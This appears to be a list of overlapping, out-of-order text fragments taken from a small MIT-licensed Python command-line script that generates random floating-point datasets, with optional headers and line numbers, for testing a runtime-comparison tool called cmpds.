"10 12 # date = 2016-11-24 08:30:31.039108 # num = 6 # lower",
"= getopts() num = opts.num[0] lower = opts.lower[0] upper = opts.upper[0] if lower",
"122.044 # Example 3: generate a dataset that mocks runtimes between # 115",
"$ {0} -D -d 2 6 10 12 # date = 2016-11-24 08:30:31.039108",
"an error message to stderr and exit. ''' lineno = inspect.stack()[f][2] sys.stderr.write('ERROR:{} {}\\n'.format(lineno,",
"# upper = 125.000 # decimal places = 3 1 116.212 2 122.327",
"''' Write an error message to stderr and exit. ''' lineno = inspect.stack()[f][2]",
"main(): ''' Main entry point. ''' opts = getopts() num = opts.num[0] lower",
"the dataset file. Typically you would want to generate at least 50 elements",
"and exit. \"\"\") # Positional arguments at the end. parser.add_argument('num', nargs=1, action='store', type=int,",
"= '\\n {0} [OPTIONS] <NUM> <LOWER> <UPPER>'.format(base) desc = 'DESCRIPTION:{0}'.format('\\n '.join(__doc__.split('\\n'))) epilog =",
"v{0}'.format(VERSION), help=\"\"\"Show program's version number and exit. \"\"\") # Positional arguments at the",
"3 1 116.212 2 122.327 3 118.571 4 120.238 5 124.852 6 119.652",
"column to read in the dataset file. Typically you would want to generate",
"want to generate at least 50 # elements to enable the use of",
"elements in the dataset. ''') parser.add_argument('lower', nargs=1, action='store', type=float, help='''The lower bound. ''')",
"number of elements in the dataset. ''') parser.add_argument('lower', nargs=1, action='store', type=float, help='''The lower",
"= random.uniform(lower, upper) yield r def info(msg, f=1): ''' Write an info message",
"the use of the SND for analysis. $ {0} -D -d 2 6",
"''' Main entry point. ''' opts = getopts() num = opts.num[0] lower =",
"the use of the standard normal distribution (SND) for analysis. ''' # License:",
"Positional arguments at the end. parser.add_argument('num', nargs=1, action='store', type=int, help='''The number of elements",
"to test cmpds. You can decorate the datasets with a header and record",
"': 'USAGE:', 'optional arguments': 'OPTIONAL ARGUMENTS', 'show this help message and exit': 'Show",
"version='%(prog)s v{0}'.format(VERSION), help=\"\"\"Show program's version number and exit. \"\"\") # Positional arguments at",
"inspect.stack()[f][2] sys.stderr.write('ERROR:{} {}\\n'.format(lineno, msg)) sys.exit(1) def getopts(): ''' Get the command line options",
"error message to stderr and exit. ''' lineno = inspect.stack()[f][2] sys.stderr.write('ERROR:{} {}\\n'.format(lineno, msg))",
"would want to generate at least 50 # elements to enable the use",
"help='''The lower bound. ''') parser.add_argument('upper', nargs=1, action='store', type=float, help='''The upper bound. ''') opts",
"allows you to specify which column to read in the dataset file. Typically",
"%(default)s. ''') parser.add_argument('-D', '--decorate', action='store_true', help='''Print header and line numbers. ''') parser.add_argument('-v', '--verbose',",
"10 and 12 seconds with 2 decimal digits of precision. # Typically you",
"{}'.format(datetime.datetime.now())) print('# num = {}'.format(num)) print('# lower = {:.3f}'.format(lower)) print('# upper = {:.3f}'.format(upper))",
"1 f = '{{:>5}} {{:>10.{}f}}'.format(opts.decimal_places) print(f.format(i, r)) else: f = '{{:>10.{}f}}'.format(opts.decimal_places) print(f.format(r)) if",
"0 for r in generate_dataset(num, lower, upper): if opts.decorate: i += 1 f",
"opts.lower[0] upper = opts.upper[0] if lower > upper: err('lower bound {} must be",
"help $ {0} -h # Example 2: generate a dataset that mocks runtimes",
"= { 'usage: ': 'USAGE:', 'optional arguments': 'OPTIONAL ARGUMENTS', 'show this help message",
"date = 2016-11-24 08:30:31.039108 # num = 6 # lower = 10.000 #",
"numbers in a range for testing. It is used to create datasets to",
"read. That works because cmpds allows you to specify which column to read",
"119.652 7 116.400 8 122.446 # Example 4: generate a dataset that mocks",
"stdout. ''' lineno = inspect.stack()[f][2] print('WARNING:{} {}'.format(lineno, msg)) def err(msg, f=1): ''' Write",
"generate at least 50 elements to enable the use of the standard normal",
"f=1): ''' Write an error message to stderr and exit. ''' lineno =",
"message to stdout. ''' lineno = inspect.stack()[f][2] print('INFO:{} {}'.format(lineno, msg)) def warn(msg, f=1):",
"''' Generate random floating point numbers in a range for testing. It is",
"os.path.basename(sys.argv[0]) name = os.path.splitext(base)[0] usage = '\\n {0} [OPTIONS] <NUM> <LOWER> <UPPER>'.format(base) desc",
"116.400 8 122.446 # Example 4: generate a dataset that mocks runtimes between",
"type=float, help='''The lower bound. ''') parser.add_argument('upper', nargs=1, action='store', type=float, help='''The upper bound. ''')",
"115 and 125 seconds per run and is decorated. # Typically you would",
"for testing. It is used to create datasets to test cmpds. You can",
"usage=usage, epilog=epilog) parser.add_argument('-d', '--decimal-places', action='store', type=int, metavar=('NUMBER'), default=3, help='''The number of decimal places.",
"and exit. ''' lineno = inspect.stack()[f][2] sys.stderr.write('ERROR:{} {}\\n'.format(lineno, msg)) sys.exit(1) def getopts(): '''",
"of the standard normal distribution (SND) for analysis. ''' # License: MIT Open",
"opts.decorate: print('# date = {}'.format(datetime.datetime.now())) print('# num = {}'.format(num)) print('# lower = {:.3f}'.format(lower))",
"import inspect import os import random import sys VERSION = '0.1' def generate_dataset(n,",
"<UPPER>'.format(base) desc = 'DESCRIPTION:{0}'.format('\\n '.join(__doc__.split('\\n'))) epilog = r''' EXAMPLES: # Example 1: help",
"python ''' Generate random floating point numbers in a range for testing. It",
"at least 50 elements to enable the use of the standard normal distribution",
"line numbers. ''') parser.add_argument('-v', '--verbose', action='count', help='''Increase the level of verbosity. ''') parser.add_argument('-V',",
"of n elements in the range [lower..upper]. A typical call might be something",
"upper bound. ''') opts = parser.parse_args() return opts def main(): ''' Main entry",
"analysis. $ {0} -D -d 2 6 10 12 # date = 2016-11-24",
"{ 'usage: ': 'USAGE:', 'optional arguments': 'OPTIONAL ARGUMENTS', 'show this help message and",
"opts = getopts() num = opts.num[0] lower = opts.lower[0] upper = opts.upper[0] if",
"{:.3f}'.format(lower)) print('# upper = {:.3f}'.format(upper)) print('# decimal places = {}'.format(opts.decimal_places)) i = 0",
"distribution (SND) for analysis. ''' # License: MIT Open Source # Copyright (c)",
"125 124.409 121.153 116.976 115.358 123.128 121.975 124.312 122.044 # Example 3: generate",
"2 6 10 12 # date = 2016-11-24 08:30:31.039108 # num = 6",
"help='''Increase the level of verbosity. ''') parser.add_argument('-V', '--version', action='version', version='%(prog)s v{0}'.format(VERSION), help=\"\"\"Show program's",
"seconds per run. # Typically you would want to generate at least 50",
"sys.exit(1) def getopts(): ''' Get the command line options using argparse. ''' #",
"datetime import inspect import os import random import sys VERSION = '0.1' def",
"places = 3 1 116.212 2 122.327 3 118.571 4 120.238 5 124.852",
"elements to enable the use of the standard normal distribution (SND) for analysis.",
"usage = '\\n {0} [OPTIONS] <NUM> <LOWER> <UPPER>'.format(base) desc = 'DESCRIPTION:{0}'.format('\\n '.join(__doc__.split('\\n'))) epilog",
"nargs=1, action='store', type=float, help='''The upper bound. ''') opts = parser.parse_args() return opts def",
"numbers. ''') parser.add_argument('-v', '--verbose', action='count', help='''Increase the level of verbosity. ''') parser.add_argument('-V', '--version',",
"and line numbers. ''') parser.add_argument('-v', '--verbose', action='count', help='''Increase the level of verbosity. ''')",
"Unfortunately I can't get rid of the \":\" reliably. def gettext(s): lookup =",
"-h # Example 2: generate a dataset that mocks runtimes between # 115",
"# Copyright (c) 2016 by <NAME> import argparse import datetime import inspect import",
"2 1 10.30 2 11.48 3 10.50 4 10.25 5 10.52 6 11.34",
"50 lower = 98 upper = 101 ''' for i in range(n): r",
"= 'DESCRIPTION:{0}'.format('\\n '.join(__doc__.split('\\n'))) epilog = r''' EXAMPLES: # Example 1: help $ {0}",
"of verbosity. ''') parser.add_argument('-V', '--version', action='version', version='%(prog)s v{0}'.format(VERSION), help=\"\"\"Show program's version number and",
"lower = opts.lower[0] upper = opts.upper[0] if lower > upper: err('lower bound {}",
"print('# date = {}'.format(datetime.datetime.now())) print('# num = {}'.format(num)) print('# lower = {:.3f}'.format(lower)) print('#",
"datasets of n elements in the range [lower..upper]. A typical call might be",
"exit. \"\"\") # Positional arguments at the end. parser.add_argument('num', nargs=1, action='store', type=int, help='''The",
"2016 by <NAME> import argparse import datetime import inspect import os import random",
"can decorate the datasets with a header and record counts to make them",
"'\\n {0} [OPTIONS] <NUM> <LOWER> <UPPER>'.format(base) desc = 'DESCRIPTION:{0}'.format('\\n '.join(__doc__.split('\\n'))) epilog = r'''",
"enable the use of the SND for analysis. $ {0} -D -d 2",
"line options using argparse. ''' # Trick to capitalize the built-in headers. #",
"least 50 # elements to enable the use of the SND for analysis.",
"parser.add_argument('-V', '--version', action='version', version='%(prog)s v{0}'.format(VERSION), help=\"\"\"Show program's version number and exit. \"\"\") #",
"122.327 3 118.571 4 120.238 5 124.852 6 119.652 7 116.400 8 122.446",
"rid of the \":\" reliably. def gettext(s): lookup = { 'usage: ': 'USAGE:',",
"if lower > upper: err('lower bound {} must be less than upper bound",
"Example 2: generate a dataset that mocks runtimes between # 115 and 125",
"= argparse.ArgumentParser(formatter_class=afc, description=desc[:-2], usage=usage, epilog=epilog) parser.add_argument('-d', '--decimal-places', action='store', type=int, metavar=('NUMBER'), default=3, help='''The number",
"= parser.parse_args() return opts def main(): ''' Main entry point. ''' opts =",
"opts = parser.parse_args() return opts def main(): ''' Main entry point. ''' opts",
"2 122.327 3 118.571 4 120.238 5 124.852 6 119.652 7 116.400 8",
"per run and is decorated. # Typically you would want to generate at",
"12 seconds with 2 decimal digits of precision. # Typically you would want",
"# lower = 10.000 # upper = 12.000 # decimal places = 2",
"argparse import datetime import inspect import os import random import sys VERSION =",
"import argparse import datetime import inspect import os import random import sys VERSION",
"= r''' EXAMPLES: # Example 1: help $ {0} -h # Example 2:",
"# lower = 115.000 # upper = 125.000 # decimal places = 3",
"10.30 2 11.48 3 10.50 4 10.25 5 10.52 6 11.34 '''.format(base) afc",
"def main(): ''' Main entry point. ''' opts = getopts() num = opts.num[0]",
"# elements to enable the use of the SND for analysis. $ {0}",
"# date = 2016-11-24 08:27:49.668509 # num = 8 # lower = 115.000",
"the datasets with a header and record counts to make them easier to",
"''' for i in range(n): r = random.uniform(lower, upper) yield r def info(msg,",
"'optional arguments': 'OPTIONAL ARGUMENTS', 'show this help message and exit': 'Show this help",
"def gettext(s): lookup = { 'usage: ': 'USAGE:', 'optional arguments': 'OPTIONAL ARGUMENTS', 'show",
"for analysis. ''' # License: MIT Open Source # Copyright (c) 2016 by",
"Copyright (c) 2016 by <NAME> import argparse import datetime import inspect import os",
"print('# lower = {:.3f}'.format(lower)) print('# upper = {:.3f}'.format(upper)) print('# decimal places = {}'.format(opts.decimal_places))",
"= 98 upper = 101 ''' for i in range(n): r = random.uniform(lower,",
"= 2016-11-24 08:27:49.668509 # num = 8 # lower = 115.000 # upper",
"action='store', type=int, help='''The number of elements in the dataset. ''') parser.add_argument('lower', nargs=1, action='store',",
"= os.path.basename(sys.argv[0]) name = os.path.splitext(base)[0] usage = '\\n {0} [OPTIONS] <NUM> <LOWER> <UPPER>'.format(base)",
"r = random.uniform(lower, upper) yield r def info(msg, f=1): ''' Write an info",
"lower bound. ''') parser.add_argument('upper', nargs=1, action='store', type=float, help='''The upper bound. ''') opts =",
"(SND) for analysis. ''' # License: MIT Open Source # Copyright (c) 2016",
"them easier to read. That works because cmpds allows you to specify which",
"Write an info message to stdout. ''' lineno = inspect.stack()[f][2] print('INFO:{} {}'.format(lineno, msg))",
"''' Get the command line options using argparse. ''' # Trick to capitalize",
"enable the use of the standard normal distribution (SND) for analysis. ''' #",
"return lookup.get(s, s) argparse._ = gettext # to capitalize help headers base =",
"of the SND for analysis. $ {0} -D -d 2 6 10 12",
"message and exit': 'Show this help message and exit.\\n ', } return lookup.get(s,",
"115 and 125 seconds per run. # Typically you would want to generate",
"gettext(s): lookup = { 'usage: ': 'USAGE:', 'optional arguments': 'OPTIONAL ARGUMENTS', 'show this",
"exit. ''' lineno = inspect.stack()[f][2] sys.stderr.write('ERROR:{} {}\\n'.format(lineno, msg)) sys.exit(1) def getopts(): ''' Get",
"runtimes between # 10 and 12 seconds with 2 decimal digits of precision.",
"r in generate_dataset(num, lower, upper): if opts.decorate: i += 1 f = '{{:>5}}",
"between # 10 and 12 seconds with 2 decimal digits of precision. #",
"epilog=epilog) parser.add_argument('-d', '--decimal-places', action='store', type=int, metavar=('NUMBER'), default=3, help='''The number of decimal places. The",
"115.358 123.128 121.975 124.312 122.044 # Example 3: generate a dataset that mocks",
"{}'.format(opts.decimal_places)) i = 0 for r in generate_dataset(num, lower, upper): if opts.decorate: i",
"= 10.000 # upper = 12.000 # decimal places = 2 1 10.30",
"120.238 5 124.852 6 119.652 7 116.400 8 122.446 # Example 4: generate",
"point numbers in a range for testing. It is used to create datasets",
"lower, upper): ''' Generate a datasets of n elements in the range [lower..upper].",
"', } return lookup.get(s, s) argparse._ = gettext # to capitalize help headers",
"lower = {:.3f}'.format(lower)) print('# upper = {:.3f}'.format(upper)) print('# decimal places = {}'.format(opts.decimal_places)) i",
"cmpds allows you to specify which column to read in the dataset file.",
"def warn(msg, f=1): ''' Write a warning message to stdout. ''' lineno =",
"08:27:49.668509 # num = 8 # lower = 115.000 # upper = 125.000",
"date = {}'.format(datetime.datetime.now())) print('# num = {}'.format(num)) print('# lower = {:.3f}'.format(lower)) print('# upper",
"message and exit.\\n ', } return lookup.get(s, s) argparse._ = gettext # to",
"# upper = 12.000 # decimal places = 2 1 10.30 2 11.48",
"'show this help message and exit': 'Show this help message and exit.\\n ',",
"def info(msg, f=1): ''' Write an info message to stdout. ''' lineno =",
"range(n): r = random.uniform(lower, upper) yield r def info(msg, f=1): ''' Write an",
"action='store', type=float, help='''The upper bound. ''') opts = parser.parse_args() return opts def main():",
"like: n = 50 lower = 98 upper = 101 ''' for i",
"generate a dataset that mocks runtimes between # 115 and 125 seconds per",
"message to stdout. ''' lineno = inspect.stack()[f][2] print('WARNING:{} {}'.format(lineno, msg)) def err(msg, f=1):",
"yield r def info(msg, f=1): ''' Write an info message to stdout. '''",
"range for testing. It is used to create datasets to test cmpds. You",
"''') parser.add_argument('lower', nargs=1, action='store', type=float, help='''The lower bound. ''') parser.add_argument('upper', nargs=1, action='store', type=float,",
"sys VERSION = '0.1' def generate_dataset(n, lower, upper): ''' Generate a datasets of",
"parser.add_argument('-v', '--verbose', action='count', help='''Increase the level of verbosity. ''') parser.add_argument('-V', '--version', action='version', version='%(prog)s",
"and 12 seconds with 2 decimal digits of precision. # Typically you would",
"6 10 12 # date = 2016-11-24 08:30:31.039108 # num = 6 #",
"lower > upper: err('lower bound {} must be less than upper bound {}'.format(lower,",
"name = os.path.splitext(base)[0] usage = '\\n {0} [OPTIONS] <NUM> <LOWER> <UPPER>'.format(base) desc =",
"12 # date = 2016-11-24 08:30:31.039108 # num = 6 # lower =",
"and is decorated. # Typically you would want to generate at least 50",
"{0} -D -d 2 6 10 12 # date = 2016-11-24 08:30:31.039108 #",
"Main entry point. ''' opts = getopts() num = opts.num[0] lower = opts.lower[0]",
"action='version', version='%(prog)s v{0}'.format(VERSION), help=\"\"\"Show program's version number and exit. \"\"\") # Positional arguments",
"mocks runtimes between # 115 and 125 seconds per run. # Typically you",
"less than upper bound {}'.format(lower, upper)) if opts.decorate: print('# date = {}'.format(datetime.datetime.now())) print('#",
"command line options using argparse. ''' # Trick to capitalize the built-in headers.",
"lineno = inspect.stack()[f][2] sys.stderr.write('ERROR:{} {}\\n'.format(lineno, msg)) sys.exit(1) def getopts(): ''' Get the command",
"this help message and exit.\\n ', } return lookup.get(s, s) argparse._ = gettext",
"mocks runtimes between # 115 and 125 seconds per run and is decorated.",
"''' # Trick to capitalize the built-in headers. # Unfortunately I can't get",
"to read. That works because cmpds allows you to specify which column to",
"test cmpds. You can decorate the datasets with a header and record counts",
"bound. ''') parser.add_argument('upper', nargs=1, action='store', type=float, help='''The upper bound. ''') opts = parser.parse_args()",
"must be less than upper bound {}'.format(lower, upper)) if opts.decorate: print('# date =",
"to generate at least 50 elements to enable the use of the standard",
"# 115 and 125 seconds per run. # Typically you would want to",
"type=int, help='''The number of elements in the dataset. ''') parser.add_argument('lower', nargs=1, action='store', type=float,",
"upper = 12.000 # decimal places = 2 1 10.30 2 11.48 3",
"''' lineno = inspect.stack()[f][2] print('INFO:{} {}'.format(lineno, msg)) def warn(msg, f=1): ''' Write a",
"= argparse.RawTextHelpFormatter parser = argparse.ArgumentParser(formatter_class=afc, description=desc[:-2], usage=usage, epilog=epilog) parser.add_argument('-d', '--decimal-places', action='store', type=int, metavar=('NUMBER'),",
"{}'.format(lower, upper)) if opts.decorate: print('# date = {}'.format(datetime.datetime.now())) print('# num = {}'.format(num)) print('#",
"upper: err('lower bound {} must be less than upper bound {}'.format(lower, upper)) if",
"bound {} must be less than upper bound {}'.format(lower, upper)) if opts.decorate: print('#",
"Open Source # Copyright (c) 2016 by <NAME> import argparse import datetime import",
"something like: n = 50 lower = 98 upper = 101 ''' for",
"2016-11-24 08:30:31.039108 # num = 6 # lower = 10.000 # upper =",
"number and exit. \"\"\") # Positional arguments at the end. parser.add_argument('num', nargs=1, action='store',",
"= 3 1 116.212 2 122.327 3 118.571 4 120.238 5 124.852 6",
"# Example 4: generate a dataset that mocks runtimes between # 10 and",
"lower = 10.000 # upper = 12.000 # decimal places = 2 1",
"help message and exit': 'Show this help message and exit.\\n ', } return",
"end. parser.add_argument('num', nargs=1, action='store', type=int, help='''The number of elements in the dataset. ''')",
"datasets with a header and record counts to make them easier to read.",
"generate at least 50 # elements to enable the use of the SND",
"2 decimal digits of precision. # Typically you would want to generate at",
"arguments at the end. parser.add_argument('num', nargs=1, action='store', type=int, help='''The number of elements in",
"8 115 125 124.409 121.153 116.976 115.358 123.128 121.975 124.312 122.044 # Example",
"help='''Print header and line numbers. ''') parser.add_argument('-v', '--verbose', action='count', help='''Increase the level of",
"is decorated. # Typically you would want to generate at least 50 #",
"use of the SND for analysis. $ {0} -D 8 115 125 #",
"description=desc[:-2], usage=usage, epilog=epilog) parser.add_argument('-d', '--decimal-places', action='store', type=int, metavar=('NUMBER'), default=3, help='''The number of decimal",
"analysis. ''' # License: MIT Open Source # Copyright (c) 2016 by <NAME>",
"Write a warning message to stdout. ''' lineno = inspect.stack()[f][2] print('WARNING:{} {}'.format(lineno, msg))",
"import datetime import inspect import os import random import sys VERSION = '0.1'",
"SND for analysis. $ {0} -D 8 115 125 # date = 2016-11-24",
"you would want to generate at least 50 # elements to enable the",
"counts to make them easier to read. That works because cmpds allows you",
"opts.num[0] lower = opts.lower[0] upper = opts.upper[0] if lower > upper: err('lower bound",
"digits of precision. # Typically you would want to generate at least 50",
"'''.format(base) afc = argparse.RawTextHelpFormatter parser = argparse.ArgumentParser(formatter_class=afc, description=desc[:-2], usage=usage, epilog=epilog) parser.add_argument('-d', '--decimal-places', action='store',",
"afc = argparse.RawTextHelpFormatter parser = argparse.ArgumentParser(formatter_class=afc, description=desc[:-2], usage=usage, epilog=epilog) parser.add_argument('-d', '--decimal-places', action='store', type=int,",
"lineno = inspect.stack()[f][2] print('WARNING:{} {}'.format(lineno, msg)) def err(msg, f=1): ''' Write an error",
"at least 50 # elements to enable the use of the SND for",
"2016-11-24 08:27:49.668509 # num = 8 # lower = 115.000 # upper =",
"level of verbosity. ''') parser.add_argument('-V', '--version', action='version', version='%(prog)s v{0}'.format(VERSION), help=\"\"\"Show program's version number",
"the SND for analysis. $ {0} -D -d 2 6 10 12 #",
"if opts.decorate: i += 1 f = '{{:>5}} {{:>10.{}f}}'.format(opts.decimal_places) print(f.format(i, r)) else: f",
"to enable the use of the SND for analysis. $ {0} -D 8",
"help='''The number of decimal places. The default is %(default)s. ''') parser.add_argument('-D', '--decorate', action='store_true',",
"for analysis. $ {0} 8 115 125 124.409 121.153 116.976 115.358 123.128 121.975",
"random import sys VERSION = '0.1' def generate_dataset(n, lower, upper): ''' Generate a",
"f = '{{:>5}} {{:>10.{}f}}'.format(opts.decimal_places) print(f.format(i, r)) else: f = '{{:>10.{}f}}'.format(opts.decimal_places) print(f.format(r)) if __name__",
"a dataset that mocks runtimes between # 115 and 125 seconds per run",
"this help message and exit': 'Show this help message and exit.\\n ', }",
"specify which column to read in the dataset file. Typically you would want",
"typical call might be something like: n = 50 lower = 98 upper",
"= 101 ''' for i in range(n): r = random.uniform(lower, upper) yield r",
"point. ''' opts = getopts() num = opts.num[0] lower = opts.lower[0] upper =",
"program's version number and exit. \"\"\") # Positional arguments at the end. parser.add_argument('num',",
"License: MIT Open Source # Copyright (c) 2016 by <NAME> import argparse import",
"# Unfortunately I can't get rid of the \":\" reliably. def gettext(s): lookup",
"date = 2016-11-24 08:27:49.668509 # num = 8 # lower = 115.000 #",
"the dataset. ''') parser.add_argument('lower', nargs=1, action='store', type=float, help='''The lower bound. ''') parser.add_argument('upper', nargs=1,",
"Generate a datasets of n elements in the range [lower..upper]. A typical call",
"make them easier to read. That works because cmpds allows you to specify",
"nargs=1, action='store', type=int, help='''The number of elements in the dataset. ''') parser.add_argument('lower', nargs=1,",
"normal distribution (SND) for analysis. ''' # License: MIT Open Source # Copyright",
"elements to enable the use of the SND for analysis. $ {0} 8",
"115 125 124.409 121.153 116.976 115.358 123.128 121.975 124.312 122.044 # Example 3:",
"8 122.446 # Example 4: generate a dataset that mocks runtimes between #",
"'.join(__doc__.split('\\n'))) epilog = r''' EXAMPLES: # Example 1: help $ {0} -h #",
"verbosity. ''') parser.add_argument('-V', '--version', action='version', version='%(prog)s v{0}'.format(VERSION), help=\"\"\"Show program's version number and exit.",
"r def info(msg, f=1): ''' Write an info message to stdout. ''' lineno",
"bound {}'.format(lower, upper)) if opts.decorate: print('# date = {}'.format(datetime.datetime.now())) print('# num = {}'.format(num))",
"generate_dataset(num, lower, upper): if opts.decorate: i += 1 f = '{{:>5}} {{:>10.{}f}}'.format(opts.decimal_places) print(f.format(i,",
"116.212 2 122.327 3 118.571 4 120.238 5 124.852 6 119.652 7 116.400",
"at the end. parser.add_argument('num', nargs=1, action='store', type=int, help='''The number of elements in the",
"help='''The number of elements in the dataset. ''') parser.add_argument('lower', nargs=1, action='store', type=float, help='''The",
"dataset that mocks runtimes between # 115 and 125 seconds per run and",
"would want to generate at least 50 elements to enable the use of",
"= inspect.stack()[f][2] print('INFO:{} {}'.format(lineno, msg)) def warn(msg, f=1): ''' Write a warning message",
"5 124.852 6 119.652 7 116.400 8 122.446 # Example 4: generate a",
"import random import sys VERSION = '0.1' def generate_dataset(n, lower, upper): ''' Generate",
"Example 4: generate a dataset that mocks runtimes between # 10 and 12",
"use of the SND for analysis. $ {0} -D -d 2 6 10",
"action='store', type=float, help='''The lower bound. ''') parser.add_argument('upper', nargs=1, action='store', type=float, help='''The upper bound.",
"upper) yield r def info(msg, f=1): ''' Write an info message to stdout.",
"is used to create datasets to test cmpds. You can decorate the datasets",
"options using argparse. ''' # Trick to capitalize the built-in headers. # Unfortunately",
"analysis. $ {0} 8 115 125 124.409 121.153 116.976 115.358 123.128 121.975 124.312",
"might be something like: n = 50 lower = 98 upper = 101",
"'--decorate', action='store_true', help='''Print header and line numbers. ''') parser.add_argument('-v', '--verbose', action='count', help='''Increase the",
"help='''The upper bound. ''') opts = parser.parse_args() return opts def main(): ''' Main",
"use of the SND for analysis. $ {0} 8 115 125 124.409 121.153",
"# num = 6 # lower = 10.000 # upper = 12.000 #",
"A typical call might be something like: n = 50 lower = 98",
"def getopts(): ''' Get the command line options using argparse. ''' # Trick",
"headers. # Unfortunately I can't get rid of the \":\" reliably. def gettext(s):",
"VERSION = '0.1' def generate_dataset(n, lower, upper): ''' Generate a datasets of n",
"run. # Typically you would want to generate at least 50 # elements",
"122.446 # Example 4: generate a dataset that mocks runtimes between # 10",
"default=3, help='''The number of decimal places. The default is %(default)s. ''') parser.add_argument('-D', '--decorate',",
"\"\"\") # Positional arguments at the end. parser.add_argument('num', nargs=1, action='store', type=int, help='''The number",
"ARGUMENTS', 'show this help message and exit': 'Show this help message and exit.\\n",
"lookup.get(s, s) argparse._ = gettext # to capitalize help headers base = os.path.basename(sys.argv[0])",
"can't get rid of the \":\" reliably. def gettext(s): lookup = { 'usage:",
"read in the dataset file. Typically you would want to generate at least",
"in the range [lower..upper]. A typical call might be something like: n =",
"'DESCRIPTION:{0}'.format('\\n '.join(__doc__.split('\\n'))) epilog = r''' EXAMPLES: # Example 1: help $ {0} -h",
"'--decimal-places', action='store', type=int, metavar=('NUMBER'), default=3, help='''The number of decimal places. The default is",
"print('WARNING:{} {}'.format(lineno, msg)) def err(msg, f=1): ''' Write an error message to stderr",
"testing. It is used to create datasets to test cmpds. You can decorate",
"the SND for analysis. $ {0} 8 115 125 124.409 121.153 116.976 115.358",
"nargs=1, action='store', type=float, help='''The lower bound. ''') parser.add_argument('upper', nargs=1, action='store', type=float, help='''The upper",
"print('# upper = {:.3f}'.format(upper)) print('# decimal places = {}'.format(opts.decimal_places)) i = 0 for",
"bound. ''') opts = parser.parse_args() return opts def main(): ''' Main entry point.",
"works because cmpds allows you to specify which column to read in the",
"'Show this help message and exit.\\n ', } return lookup.get(s, s) argparse._ =",
"random.uniform(lower, upper) yield r def info(msg, f=1): ''' Write an info message to",
"to capitalize the built-in headers. # Unfortunately I can't get rid of the",
"I can't get rid of the \":\" reliably. def gettext(s): lookup = {",
"# Example 3: generate a dataset that mocks runtimes between # 115 and",
"capitalize help headers base = os.path.basename(sys.argv[0]) name = os.path.splitext(base)[0] usage = '\\n {0}",
"lookup = { 'usage: ': 'USAGE:', 'optional arguments': 'OPTIONAL ARGUMENTS', 'show this help",
"num = 6 # lower = 10.000 # upper = 12.000 # decimal",
"# 10 and 12 seconds with 2 decimal digits of precision. # Typically",
"places = {}'.format(opts.decimal_places)) i = 0 for r in generate_dataset(num, lower, upper): if",
"os import random import sys VERSION = '0.1' def generate_dataset(n, lower, upper): '''",
"epilog = r''' EXAMPLES: # Example 1: help $ {0} -h # Example",
"datasets to test cmpds. You can decorate the datasets with a header and",
"''' Generate a datasets of n elements in the range [lower..upper]. A typical",
"n = 50 lower = 98 upper = 101 ''' for i in",
"# decimal places = 2 1 10.30 2 11.48 3 10.50 4 10.25",
"11.34 '''.format(base) afc = argparse.RawTextHelpFormatter parser = argparse.ArgumentParser(formatter_class=afc, description=desc[:-2], usage=usage, epilog=epilog) parser.add_argument('-d', '--decimal-places',",
"The default is %(default)s. ''') parser.add_argument('-D', '--decorate', action='store_true', help='''Print header and line numbers.",
"parser.add_argument('lower', nargs=1, action='store', type=float, help='''The lower bound. ''') parser.add_argument('upper', nargs=1, action='store', type=float, help='''The",
"the built-in headers. # Unfortunately I can't get rid of the \":\" reliably.",
"argparse.ArgumentParser(formatter_class=afc, description=desc[:-2], usage=usage, epilog=epilog) parser.add_argument('-d', '--decimal-places', action='store', type=int, metavar=('NUMBER'), default=3, help='''The number of",
"for analysis. $ {0} -D -d 2 6 10 12 # date =",
"a range for testing. It is used to create datasets to test cmpds.",
"than upper bound {}'.format(lower, upper)) if opts.decorate: print('# date = {}'.format(datetime.datetime.now())) print('# num",
"to specify which column to read in the dataset file. Typically you would",
"i += 1 f = '{{:>5}} {{:>10.{}f}}'.format(opts.decimal_places) print(f.format(i, r)) else: f = '{{:>10.{}f}}'.format(opts.decimal_places)",
"= {:.3f}'.format(lower)) print('# upper = {:.3f}'.format(upper)) print('# decimal places = {}'.format(opts.decimal_places)) i =",
"$ {0} -D 8 115 125 # date = 2016-11-24 08:27:49.668509 # num",
"125.000 # decimal places = 3 1 116.212 2 122.327 3 118.571 4",
"num = {}'.format(num)) print('# lower = {:.3f}'.format(lower)) print('# upper = {:.3f}'.format(upper)) print('# decimal",
"return opts def main(): ''' Main entry point. ''' opts = getopts() num",
"print('# num = {}'.format(num)) print('# lower = {:.3f}'.format(lower)) print('# upper = {:.3f}'.format(upper)) print('#",
"101 ''' for i in range(n): r = random.uniform(lower, upper) yield r def",
"the command line options using argparse. ''' # Trick to capitalize the built-in",
"upper = {:.3f}'.format(upper)) print('# decimal places = {}'.format(opts.decimal_places)) i = 0 for r",
"{{:>10.{}f}}'.format(opts.decimal_places) print(f.format(i, r)) else: f = '{{:>10.{}f}}'.format(opts.decimal_places) print(f.format(r)) if __name__ == '__main__': main()",
"runtimes between # 115 and 125 seconds per run and is decorated. #",
"lower = 115.000 # upper = 125.000 # decimal places = 3 1",
"reliably. def gettext(s): lookup = { 'usage: ': 'USAGE:', 'optional arguments': 'OPTIONAL ARGUMENTS',",
"easier to read. That works because cmpds allows you to specify which column",
"print('INFO:{} {}'.format(lineno, msg)) def warn(msg, f=1): ''' Write a warning message to stdout.",
"header and record counts to make them easier to read. That works because",
"to generate at least 50 # elements to enable the use of the",
"+= 1 f = '{{:>5}} {{:>10.{}f}}'.format(opts.decimal_places) print(f.format(i, r)) else: f = '{{:>10.{}f}}'.format(opts.decimal_places) print(f.format(r))",
"because cmpds allows you to specify which column to read in the dataset",
"-D -d 2 6 10 12 # date = 2016-11-24 08:30:31.039108 # num",
"the level of verbosity. ''') parser.add_argument('-V', '--version', action='version', version='%(prog)s v{0}'.format(VERSION), help=\"\"\"Show program's version",
"i in range(n): r = random.uniform(lower, upper) yield r def info(msg, f=1): '''",
"opts.upper[0] if lower > upper: err('lower bound {} must be less than upper",
"115.000 # upper = 125.000 # decimal places = 3 1 116.212 2",
"print('# decimal places = {}'.format(opts.decimal_places)) i = 0 for r in generate_dataset(num, lower,",
"to enable the use of the SND for analysis. $ {0} -D -d",
"upper)) if opts.decorate: print('# date = {}'.format(datetime.datetime.now())) print('# num = {}'.format(num)) print('# lower",
"type=int, metavar=('NUMBER'), default=3, help='''The number of decimal places. The default is %(default)s. ''')",
"124.409 121.153 116.976 115.358 123.128 121.975 124.312 122.044 # Example 3: generate a",
"6 119.652 7 116.400 8 122.446 # Example 4: generate a dataset that",
"getopts() num = opts.num[0] lower = opts.lower[0] upper = opts.upper[0] if lower >",
